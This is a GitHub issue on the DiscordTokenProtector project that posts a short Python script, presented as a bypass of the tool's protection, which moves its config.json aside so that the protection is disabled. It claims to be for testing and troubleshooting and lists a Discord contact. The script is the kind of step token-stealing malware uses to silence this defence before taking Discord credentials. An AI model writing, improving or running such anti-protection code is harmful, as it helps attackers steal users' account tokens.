Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bypass for killprotector Function in DiscordTokenProtector #91

Open
cheflilou opened this issue Dec 2, 2024 · 0 comments
Open

Bypass for killprotector Function in DiscordTokenProtector #91

cheflilou opened this issue Dec 2, 2024 · 0 comments

Comments

@cheflilou
Copy link

The killprotector function in DiscordTokenProtector was analyzed, and a bypass has been implemented for testing or troubleshooting purposes. Below is the bypass script:
import os
import shutil

def bypass_killprotector():
roaming = os.getenv('APPDATA')
path = os.path.join(roaming, "DiscordTokenProtector")
config_path = os.path.join(path, "config.json")
try:
if os.path.exists(path):

        backup_path = os.path.join(path, "config_backup.json")
        if os.path.exists(config_path):
            shutil.move(config_path, backup_path)
            print(f"Bypassed protection by backing up config.json to: {backup_path}")
        else:
            print("config.json not found, no protection to bypass.")
    else:
        print("DiscordTokenProtector directory does not exist.")
except Exception as e:
    print(f"Error during bypass: {e}")

bypass_killprotector()
Purpose of the Bypass:

This bypass script is designed to rename or back up the config.json file found in the DiscordTokenProtector directory.
By doing so, the protection functionality is effectively disabled, allowing further investigation or development.

Contact Information: Discord: notadl22

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant